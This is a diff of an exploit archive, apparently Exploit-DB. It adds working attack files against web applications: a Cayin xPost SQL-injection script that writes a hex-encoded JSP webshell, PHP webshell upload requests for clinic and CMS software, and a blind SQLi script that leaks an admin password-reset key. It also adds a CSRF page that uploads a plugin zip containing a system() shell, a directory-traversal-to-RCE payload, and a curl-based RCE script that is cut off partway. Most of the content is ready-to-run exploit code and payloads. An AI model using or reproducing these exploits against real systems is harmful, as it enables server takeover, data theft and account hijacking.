# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
|
||||
#
|
||||
#
|
||||
# Vendor: CAYIN Technology Co., Ltd.
|
||||
# Product web page: https://www.cayintech.com
|
||||
# Affected version: 2.5.18103
|
||||
# 2.0
|
||||
# 1.0
|
||||
#
|
||||
# Summary: CAYIN xPost is the web-based application software, which offers a
|
||||
# combination of essential tools to create rich contents for digital signage in
|
||||
# different vertical markets. It provides an easy-to-use platform for instant
|
||||
# data entry and further extends the usage of CAYIN SMP players to meet users'
|
||||
# requirements of frequent, daily maintenance.
|
||||
#
|
||||
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
|
||||
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
|
||||
# is not properly sanitised before being returned to the user or used in SQL queries.
|
||||
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
|
||||
# and execute SYSTEM commands.
|
||||
#
|
||||
# --------------------------------------------------------------------------------
|
||||
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
|
||||
# # Injecting...
|
||||
# # Executing...
|
||||
#
|
||||
# Command: whoami
|
||||
#
|
||||
# nt authority\system
|
||||
#
|
||||
#
|
||||
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
|
||||
# lqwrm@zslab:~$
|
||||
# --------------------------------------------------------------------------------
|
||||
#
|
||||
# Tested on: Microsoft Windows 10 Home
|
||||
# Microsoft Windows 8.1
|
||||
# Microsoft Windows Server 2016
|
||||
# Microsoft Windows Server 2012
|
||||
# Microsoft Windows 7 Ultimate SP1
|
||||
# Apache Tomcat/9.0.1
|
||||
# MySQL/5.0
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2020-5571
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
|
||||
#
|
||||
#
|
||||
# 15.05.2020
|
||||
#
|
||||
|
||||
import requests as req
|
||||
import time as vremeto
|
||||
import sys as sistemot
|
||||
import re as regularno
|
||||
|
||||
if len(sistemot.argv) < 2:
|
||||
print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
|
||||
print("Usage: ./wayfinder.py ip:port")
|
||||
sistemot.exit(19)
|
||||
else:
|
||||
ip = sistemot.argv[1]
|
||||
|
||||
filename = "thricer.jsp"
|
||||
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
|
||||
constr = "-251' UNION ALL SELECT "
|
||||
|
||||
print("# Injecting...")
|
||||
|
||||
cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612"
|
||||
cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64"
|
||||
cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0"
|
||||
cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f"
|
||||
cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484"
|
||||
cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c"
|
||||
cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505"
|
||||
cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f"
|
||||
cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657"
|
||||
cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70"
|
||||
cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617"
|
||||
cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050"
|
||||
cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786"
|
||||
cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020"
|
||||
cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757"
|
||||
cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d"
|
||||
cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496"
|
||||
cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561"
|
||||
cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726"
|
||||
cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20"
|
||||
cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746"
|
||||
cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064"
|
||||
cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2"
|
||||
cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a"
|
||||
cmdjsp += "0a0a"
|
||||
|
||||
columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL "
|
||||
sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -"
|
||||
mysqli = constr + cmdjsp + columns + sqlwrite
|
||||
r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True)
|
||||
vremeto.sleep(1)
|
||||
|
||||
print("# Executing...")
|
||||
|
||||
r = req.get("http://" + ip + "/" + filename + "?cmd=whoami")
|
||||
clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text)
|
||||
clean = clean.group(1).replace("<BR>", "\n")
|
||||
print(clean)
|
||||
print("You have a webshell @ http://" + ip + "/" + filename)
|
20
exploits/php/webapps/48542.txt
Normal file
20
exploits/php/webapps/48542.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
|
||||
# Date: 2020-06-02
|
||||
# Exploit Author: Selim Enes 'Enesdex' Karaduman
|
||||
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
|
||||
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
|
||||
# Version: 2.0
|
||||
# Tested on: Windows 10 - Wamp Server
|
||||
|
||||
--Vulnerable file /full-profile.php
|
||||
|
||||
--Vulnerable code;
|
||||
$ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");
|
||||
|
||||
Id parameter's value is going into sql query directly!
|
||||
|
||||
--Proof Of Concept
|
||||
|
||||
sqlmap -u "http://TARGET/hostel/full-profile.php?id=6"
|
||||
OR
|
||||
http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error
|
62
exploits/php/webapps/48544.txt
Normal file
62
exploits/php/webapps/48544.txt
Normal file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-06-02
|
||||
# Exploit Author: BKpatron
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Win 10
|
||||
# CVE: N/A
|
||||
|
||||
# Vulnerability:
|
||||
Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
|
||||
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
|
||||
# vulnerable file : manage_website.php
|
||||
# Details:
|
||||
login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
|
||||
change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
|
||||
path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
|
||||
|
||||
# Proof of Concept:
|
||||
http://localhost/source%20code/manage_website.php
|
||||
|
||||
POST /source%20code/manage_website.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------135192786613366
|
||||
Content-Length: 2539
|
||||
Referer: http://localhost/source%20code/manage_website.php
|
||||
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
-----------------------------58631544014332: undefined
|
||||
Content-Disposition: form-data; name="title"
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="short_title"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="footer"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="currency_code"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="currency_symbol"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="old_website_image"
|
||||
|
||||
logo for hospital system.jpg
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="website_image"; filename="shell.php"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<?php echo shell_exec($_GET["cmd"]); ?>
|
34
exploits/php/webapps/48545.py
Executable file
34
exploits/php/webapps/48545.py
Executable file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)
|
||||
# Date: 2020-06-04
|
||||
# Exploit Author: Gus Ralph
|
||||
# Vendor Homepage: https://www.navigatecms.com/en/home
|
||||
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
|
||||
# Version: 2.8.7
|
||||
# Tested on: Ubuntu
|
||||
# CVE: N/A
|
||||
|
||||
# This script will leak the "activation_key" value for the user who's ID is set to 1 in the database.
|
||||
# The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash.
|
||||
# An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]`
|
||||
|
||||
import requests, time, string
|
||||
|
||||
user = raw_input("Please enter your username: \n")
|
||||
password = raw_input("Please enter your password: \n")
|
||||
URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n")
|
||||
|
||||
s = requests.Session()
|
||||
data = {'login-username': (None, user), 'login-password':(None, password)}
|
||||
s.post(url = URL + "login.php", files = data)
|
||||
dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits
|
||||
final = ""
|
||||
while True:
|
||||
for x in dictionary:
|
||||
payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -'
|
||||
r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload)
|
||||
if int(r.elapsed.total_seconds()) > 4:
|
||||
final += x
|
||||
print "Leaking contents of admin hash: " + final
|
||||
break
|
||||
else:
|
||||
pass
|
76
exploits/php/webapps/48546.txt
Normal file
76
exploits/php/webapps/48546.txt
Normal file
|
@ -0,0 +1,76 @@
|
|||
# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection
|
||||
# Google Dork: inurl:/eotools_share/
|
||||
# Date: 2020-06-03
|
||||
# Exploit Author: TSAR
|
||||
# Vendor Homepage: http://www.oriolespinal.es/eowd
|
||||
# Software Link: http://www.oriolespinal.es/eotools
|
||||
# Version: ALL VERSION UP TO LATEST
|
||||
# Tested on: MACOS 10.11.2
|
||||
# CVE : NOt YET
|
||||
|
||||
[1]########### SQl INJECTION ###########
|
||||
|
||||
Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable
|
||||
|
||||
http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10--
|
||||
|
||||
|
||||
[2]########### SQl INJECTION ###########
|
||||
|
||||
|
||||
|
||||
|
||||
Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable:
|
||||
|
||||
|
||||
POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1
|
||||
Host: victim.com
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556
|
||||
Content-Length: 740
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada
|
||||
|
||||
-----------------------------165073870416097602871919119556
|
||||
Content-Disposition: form-data; name="userfile"; filename="shell.php"
|
||||
Content-Type: image/png
|
||||
|
||||
PNG;
|
||||
********************************/
|
||||
********************************/
|
||||
GIF89a;
|
||||
********************/
|
||||
********************/<?php $_GET[d]($_GET[dd]); ?>
|
||||
-----------------------------165073870416097602871919119556
|
||||
Content-Disposition: form-data; name="categoria"
|
||||
|
||||
pdfs
|
||||
-----------------------------165073870416097602871919119556
|
||||
Content-Disposition: form-data; name="descripcion"
|
||||
|
||||
123
|
||||
-----------------------------165073870416097602871919119556
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
upload
|
||||
-----------------------------165073870416097602871919119556--
|
||||
|
||||
|
||||
the shell path is:
|
||||
|
||||
http://victim.com/path/eotools_files/files/shell.php
|
||||
|
||||
|
||||
==========================================================
|
||||
|
||||
==========================================================
|
||||
|
||||
Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r
|
||||
[ALL MUSLIM AND ARAB HACKERS]
|
||||
|
||||
==========================================================
|
62
exploits/php/webapps/48547.txt
Normal file
62
exploits/php/webapps/48547.txt
Normal file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-06-02
|
||||
# Exploit Author: BKpatron
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
|
||||
# Version: v1.0
|
||||
# Tested on: Win 10
|
||||
# CVE: N/A
|
||||
|
||||
# Vulnerability:
|
||||
Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
|
||||
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
|
||||
# vulnerable file : manage_website.php
|
||||
# Details:
|
||||
login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
|
||||
change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
|
||||
path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
|
||||
|
||||
# Proof of Concept:
|
||||
http://localhost/source%20code/manage_website.php
|
||||
|
||||
POST /source%20code/manage_website.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------135192786613366
|
||||
Content-Length: 2539
|
||||
Referer: http://localhost/source%20code/manage_website.php
|
||||
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
-----------------------------58631544014332: undefined
|
||||
Content-Disposition: form-data; name="title"
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="short_title"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="footer"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="currency_code"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="currency_symbol"
|
||||
|
||||
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="old_website_image"
|
||||
|
||||
logo for hospital system.jpg
|
||||
-----------------------------58631544014332
|
||||
Content-Disposition: form-data; name="website_image"; filename="shell.php"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<?php echo shell_exec($_GET["cmd"]); ?>
|
99
exploits/php/webapps/48548.txt
Normal file
99
exploits/php/webapps/48548.txt
Normal file
|
@ -0,0 +1,99 @@
|
|||
# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
|
||||
# Date: 2020-06-04
|
||||
# Exploit Author: Gus Ralph
|
||||
# Vendor Homepage: https://www.navigatecms.com/en/home
|
||||
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
|
||||
# Version: 2.8.7
|
||||
# Tested on: Ubuntu
|
||||
# CVE:
|
||||
|
||||
<!--
|
||||
After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location):
|
||||
http://DOMAIN.com/navigate/plugins/chiv/chiv.php
|
||||
-->
|
||||
|
||||
<script>
|
||||
var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload";
|
||||
|
||||
function byteValue(x) {
|
||||
return x.charCodeAt(0) & 0xff;
|
||||
}
|
||||
|
||||
function toBytes(datastr) {
|
||||
var ords = Array.prototype.map.call(datastr, byteValue);
|
||||
var ui8a = new Uint8Array(ords);
|
||||
return ui8a.buffer;
|
||||
}
|
||||
|
||||
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
|
||||
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
|
||||
this.send(toBytes(datastr));
|
||||
}
|
||||
}
|
||||
|
||||
function fileUpload(fileData, fileName) {
|
||||
var fileSize = fileData.length,
|
||||
boundary = "---------------------------399386530342483226231822376790",
|
||||
uri = logUrl,
|
||||
xhr = new XMLHttpRequest();
|
||||
|
||||
var additionalFields = {
|
||||
}
|
||||
|
||||
var fileFieldName = "extension-upload";
|
||||
|
||||
xhr.open("POST", uri, true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
|
||||
xhr.setRequestHeader("Content-Length", fileSize);
|
||||
xhr.withCredentials = "true";
|
||||
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState == 4) {
|
||||
if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
|
||||
|
||||
if (xhr.responseText != "") {
|
||||
alert(JSON.parse(xhr.responseText).msg); // display response.
|
||||
}
|
||||
} else if (xhr.status == 0) {
|
||||
$("#goto").show();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
var body = "";
|
||||
|
||||
for (var i in additionalFields) {
|
||||
if (additionalFields.hasOwnProperty(i)) {
|
||||
body += addField(i, additionalFields[i], boundary);
|
||||
}
|
||||
}
|
||||
|
||||
body += addFileField(fileFieldName, fileData, fileName, boundary);
|
||||
body += "--" + boundary + "--";
|
||||
xhr.sendAsBinary(body);
|
||||
return true;
|
||||
}
|
||||
|
||||
function addField(name, value, boundary) {
|
||||
var c = "--" + boundary + "\r\n"
|
||||
c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
|
||||
c += value + "\r\n";
|
||||
return c;
|
||||
}
|
||||
|
||||
function addFileField(name, value, filename, boundary) {
|
||||
var c = "--" + boundary + "\r\n"
|
||||
c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
|
||||
c += "Content-Type: application/zip\r\n\r\n";
|
||||
c += value + "\r\n";
|
||||
return c;
|
||||
}
|
||||
|
||||
var start = function() {
|
||||
var c = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x00\x63\x68\x69\x76\x2f\x55\x54\x09\x00\x03\xc2\xe3\xa1\x5e\xdb\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x33\xe2\xa1\x5e\x42\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x55\x8d\x41\x0a\xc2\x30\x10\x45\xf7\x39\xc5\x90\xb5\x34\x48\x17\x42\x57\x4a\xc9\x05\xea\x09\x62\x32\x90\xa0\xe9\x84\x64\x5a\x15\xf1\xee\xda\xd8\x2e\xfc\xcb\xff\x1e\xff\xbf\x04\x7c\x23\x39\xf0\x0d\x65\x07\xf2\x34\xc0\x59\x6b\xd0\x72\xf7\x03\x33\xe6\x12\x68\x5c\xd0\xbe\x69\xdb\xc3\xd6\x9b\x89\x3d\xe5\xa5\xee\x7d\x98\x0d\xd3\x06\xee\x78\x29\x81\xeb\x96\x67\x4e\xa5\x53\xca\x1b\x7b\x8d\xae\x09\xa4\x8e\xf6\x5f\x76\x58\x6c\x0e\x89\xd7\x87\x01\x23\x31\x42\x4f\x31\x9a\xd1\x81\x7e\xa0\x9d\x2a\x5b\x75\x7e\xa6\x3a\xbc\x7d\x88\xb7\xf8\x00\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x18\xe3\xa1\x5e\x06\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x68\x31\x3e\x57\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20\x43\x68\x69\x76\x61\x74\x6f\x27\x73\x20\x52\x43\x45\x20\x70\x6c\x75\x67\x69\x6e\x20\x66\x6f\x72\x20\x4e\x61\x76\x69\x67\x61\x74\x65\x20\x43\x4d\x53\x2e\x3c\x2f\x68\x31\x3e\x0a\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x09\x00\x03\xb5\xe3\xa1\x5e\xa4\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\xff\x41\x00\x00\x00\x00\x63\x68\x69\x76\x2f\x55\x54\x05\x00\x03\xc2\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\x81\x3f\x00\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x33\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x0e\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x18\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x98\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x05\x00\x03\xb5\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x4f\x01\x00\x00\xfe\x01\x00\x00\x00\x00"
|
||||
fileUpload(c, "chiv.zip");
|
||||
};
|
||||
|
||||
start();
|
||||
</script>
|
29
exploits/php/webapps/48550.txt
Normal file
29
exploits/php/webapps/48550.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal
|
||||
# Date: 2020-06-04
|
||||
# Exploit Author: Gus Ralph
|
||||
# Vendor Homepage: https://www.navigatecms.com/en/home
|
||||
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
|
||||
# Version: 2.8.7
|
||||
# Tested on: Ubuntu
|
||||
# CVE: CVE-2020-13795
|
||||
|
||||
A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data.
|
||||
|
||||
For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example:
|
||||
`/var/www/html/navigate/private/1/templates/`
|
||||
|
||||
My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`).
|
||||
|
||||
My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php`
|
||||
|
||||
Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example:
|
||||
|
||||
Traversal payload:
|
||||
`../../../navigate.php`
|
||||
|
||||
PHP Code execution payload:
|
||||
```
|
||||
<?php
|
||||
system($_GET['cmd']);
|
||||
?>
|
||||
```
|
52
exploits/php/webapps/48552.sh
Executable file
52
exploits/php/webapps/48552.sh
Executable file
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-05-31
|
||||
# Exploit Author: Selim Enes 'Enesdex' Karaduman
|
||||
# Vendor Homepage: https://phpgurukul.com/
|
||||
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10 / Xampp Server and Wamp Server
|
||||
# CVE : N/A
|
||||
# Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System
|
||||
|
||||
#!/bin/bash
|
||||
echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution"
|
||||
echo "# Author ---> Selim Enes Karaduman"
|
||||
echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND"
|
||||
while getopts u:m:p:c: par
|
||||
do
|
||||
case $par in
|
||||
u) url=$OPTARG ;;
|
||||
m) mnum=$OPTARG ;;
|
||||
p) passwd=$OPTARG ;;
|
||||
c) command=$OPTARG ;;
|
||||
esac
|
||||
done
|
||||
sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2)
|
||||
url_for_req=$(echo $url | cut -d "/" -f 3)
|
||||
function upload(){
|
||||
curl -i -s -k -X $'POST' \
|
||||
-H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \
|
||||
-b $"$sess" \
|
||||
